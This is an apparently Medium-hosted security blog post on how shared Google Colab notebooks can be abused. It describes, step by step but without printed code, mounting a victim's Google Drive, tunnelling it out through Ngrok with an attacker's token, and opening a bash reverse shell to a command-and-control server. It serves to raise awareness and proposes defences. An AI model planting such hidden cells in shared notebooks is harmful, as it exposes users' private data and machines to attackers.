Abusing Google Colaboratory

Careful Who You Colab With:

abusing google colaboratory

4n7m4n
10 min readJul 27, 2022

--

Imagine being a machine learning (ML) researcher, a data analyst, or an educator using Google Colaboratory to share your code with colleagues and/or community members. Suddenly you find your Google Drive empty, and some of your private research is finding its way to public repositories. You ask yourself, "how did this happen?" "I am always careful not to fall for phishing emails," you proclaim.

In this article, I will introduce a new threat vector via Google Colaboratory that puts your Google Drive data, among other things, at risk. By sharing this research, I hope the ML community will become conscious of the potential threats and practice good security when collaborating and sharing their projects.

Where did this research begin?

A few months ago, I played with several Artificial Intelligence music tools, including an OpenAI project called Jukebox. This platform allows users to train Artificial Intelligence (AI) by feeding it a song and whatever written lyrics the user wishes. The AI will create a song where the vocalist sings from your provided lyrics. I wanted Elvis Presley to sing Sir Mix-A-Lot's "Baby Got Back" in the style of Elvis' "Suspicious Minds."

Elvis
Sir Mix-A-Lot Video “Baby Got Back”

I had been hanging out on the DaDaBots Discord server for some time. I jumped into the OpenAI Jukebox channel, where a user, Broccaloo, helped me by tweaking some of my configurations in a Google Colab notebook they shared with me.

Shared Colab Notebook Link

I opened the Colab notebook and began the process of mounting my Google Drive in Colab as usual. When the following warning popped up, it hit me…

Google Drive Mount Warning

"Make sure you review notebook code prior to allowing this access." I pondered, "How many times had I run a Colab notebook before this without a second thought?" "How many others completely overlook this warning?" I questioned.

THIS is where this security research began.

What is Google Colaboratory?

If you already have a good understanding of Colab, you can skip to the next section.

I'll let Google Define Colab for us:

Colaboratory, or “Colab” for short, is a product from Google Research. Colab allows anybody to write and execute arbitrary python code through the browser, and is especially well suited to machine learning, data analysis and education. More technically, Colab is a hosted Jupyter notebook service that requires no setup to use, while providing access free of charge to computing resources including GPUs.

Colab resources are not guaranteed and not unlimited, and the usage limits sometimes fluctuate.

Users who are interested in more reliable access to better resources may be interested in Colab Pro.

What is the difference between Jupyter and Colab?l

Jupyter is the open source project on which Colab is based. Colab allows you to use and share Jupyter notebooks with others without having to download, install, or run anything (Google colab).

In Colab, users can write Python code in their own Jupyter Notebooks, which they store in their Google Drives. Users write this code in Jupyter cells in the notebooks. The user executes the code in these cells by pushing the excute button. When the user opens or starts a notebook, it connects to the Colab runtime, where collab assigns the project a GPU and other resources in a Linux Virtual Machine (VM).

Colab Runtime Connected to the Notebook

Where is my code executed? What happens to my execution state if I close the browser window?

Code is executed in a virtual machine private to your account. Virtual machines are deleted when idle for a while, and have a maximum lifetime enforced by the Colab service (Google Colab).

Users may also mount their Google Drive to their runtime to access persistent storage.

Jupyter Notebook Cell for mounting Google Drive

Users can also import Python Libraries, Install Pip dependencies, and clone Git repositories into their runtimes via notebook code.

Jupyter Cell pip
Jupyter Cell Import Python Library' time.'
Jupyter cell cloning a git repository

Once connected to the Colab runtime, users also have access to a terminal where they can run shell commands and navigate their Google Drive file system if mounted.

Google Colab Terminal

Jupyter Notebook provides several System Aliases or command shortcuts to common *nix commands such as ls, cat, ps, kill, and many others. To use them, users need to prepend an exclamation point to the command : !ls !cat !ps !kill

Jupyter System Aliases

How Might This Be Abused?

Phishing

An adversary could conduct a phishing campaign by sending emails to ML researchers or other targets which contain links to malicious Colab Notebooks.

The adversary might instead post links to malicious Colab notebooks on AI Community Discord servers.

Google Drive Data

Suppose an adversary shares a Colab Notebook containing malicious code with a target user, and the user chooses not to check through every line of code before executing. In that case, the user is executing malicious code. If the user mounts their Google Drive, they have potentially given access to their drive to the adversary. The adversary can now exfiltrate, destroy, or manipulate the victim's Google Drive data.

To get a clear understanding of what an adversary might have access to if they successfully access a victim's Google Drive, here are the permissions one grants when agreeing to mount their Google Drive:

  • See, edit, create and delete ALL of your Google Drive files
  • View the photos, videos, albums in your Google Photos
  • Retrieve Mobile client configuration and experimentation
  • View Google people information such as profiles and contacts
  • See, edit, create and delete any of your Google Drive Documents
Google Drive Permissions Granted

Shellz

The malicious code could contain a reverse shell, establishing a Command & Control (C2) connection back to the adversary.

Tactics, Techniques, and Procedures (TTPs)

How might we map this activity to adversary TTPs? We can map them to the MITRE ATLAS (Adversarial Threat Landscape for Artificial-Intelligence Systems) framework. ATLAS is a knowledge base of adversary tactics, techniques, and case studies for machine learning (ML) systems based on real-world observations, demonstrations from ML red teams and security groups, and the state of the possible from academic research. ATLAS is modeled after the MITRE ATT&CK® framework, and its tactics and techniques complement those in ATT&CK.

For this sharing of Jupyter Notebooks, we can map it to the Initial Access tactic on the ATT&CK framework and under the phishing technique. This is the phishing email procedure we discussed above. We can also map the Discord server links as a procedure for this technique.

We might instead map this procedure to the Initial Access tactic in the ATLAS framework under their ML Supply Chain Compromise technique. To do this, we might need to add a sub-technique of Jupyter Notebook Sharing.

It also makes sense to map the Execution tactic to the User Execution technique on the ATLAS framework.

MITRE ATLAS

Adversaries have some choices in delivering malicious content to their targets. They might hide malicious code in the Jupyter cells or hide it in Git Repositories that their Jupyter Notebooks clone.

Hiding Malicious Code in Jupyter Cells

Below are images showing code in Jupyter Notebooks. Both notebooks contain code that grants the sharer access to the victim's Google Drive data. In this first image, it should be relatively easy for the user to see the malicious content if they know what to look for. They might also recognize that this code might not do the anticipated activity the user is expecting.

Easy to Spot Malicious Code

What about this next image? The user might have to do a lot of code reading to find the malicious content hidden in the many lines of ML code. Keep in mind that this image only shows a small portion of the full code.

Not-so-easy to Spot Malicious Code

Google Drive Data Exfiltration via Malicious Jupyter Code Example

We will now run through an example Jupyter code that gives an adversary access to their target's Google Drive via Ngrok. Ngrok is an application that exposes a local host to the internet via a URL.

Below is the code in each of the Jupyter cells:

  1. mount the victim's Google Drive
  • This is normal behavior for Colab Notebooks

2. download and untar the Ngrok tarball to the victim's Google Drive

3. add the adversary's Ngrok API Auth Token to the victim's Ngrok configuration

  • Don't worry. This one is expired.

4. start a python server on a specified port (9999) in this case, and run Ngrok on the same port

When Ngrok receives the callback from the Colab instance, it will provide the adversary with the URL of the tunnel to the victim's Google Drive.

Ngrok Agent

When the victim navigates to the tunnel URL, they will have the victim's Google Drive directory list in their browser. They can navigate to and download any file in the victim's drive.

Reverse Shell via Malicious Jupyter Code Example

Next we will run through an example Jupyter code that gives an adversary a reverse shell in the victim's Google Colab VM.

  1. mount the victim's Google Drive
  • Same as before

2. execute the bash, TCP reverse shell out to the adversary's C2 server IP address

When the adversary receives the TCP connection to their C2 server, they can execute bash commands in the victim's Google Collab container.

Might there possibly be a VM escape? That might be a blog for another day…

Why does this Matter?

It is essential for ML researchers and others who might use Jupyter Notebook collaboration platforms, such as Google Colab, to recognize the threat vector I described in this article.

GPUs are harder to find and are more expensive lately. Google Colab is free, and Colab Pro is cheap. This is one reason ML researchers are now turning to cloud platforms like Colab. Researchers also enjoy collaborating and sharing their work with others, much as developers in the open source community do. For these reasons and others, we are seeing a growth in the number of cloud collaboration ML frameworks users. Most of these users are not, however, security experts. This puts users at higher risk while using these platforms.

Also, phishing is easy. Adversaries are good at it and can run phishing campaigns at a minimal cost. The risk vs. reward ratio is quite suitable for adversaries.

What can we do about it?

Read your code

This might take the user some time, but reading and understanding what the code is doing and what malicious code looks like are crucial to keeping their data safe. When that Google Drive warning pops up, asking you if you are sure you want to mount it, let that remind you to cancel and go back to look at the code.

Develop a Code scanning plugin for Colab

This could be an excellent project for the community to contribute to. A Collab plugin that scans for known malicious code could be the solution to the time-consuming manual code review. One might still take care not to trust an automated process completely. It might not be perfect and might miss something.

Ask Google to help

Maybe if this gets enough attention, and we ask Google nicely, they might create their own code scanning plugin. You never know until you ask.

Be Careful Who You Colab With

Don't automatically trust everyone you meet in the ML community. Remember, phishing is easy.

Conclusion

I hope this article reaches the ML/AI research community and provides insight into the threats that exist when using these amazing collaboration platforms. I am a proud member of both the ML/AI and security communities. I hope that my security experience and research help keep ML/AI research secure so that it will remain as fun and amazing as it has been.

As always, thanks for reading, and stand by for more sauce!

--

--

4n7m4n

Red Team Pen Testing Nobody | OSCP | InfoSec | Tech Junkie | OIF Veteran | Tweets are mine, not yours, nor anyone else's... Certainly not my employer's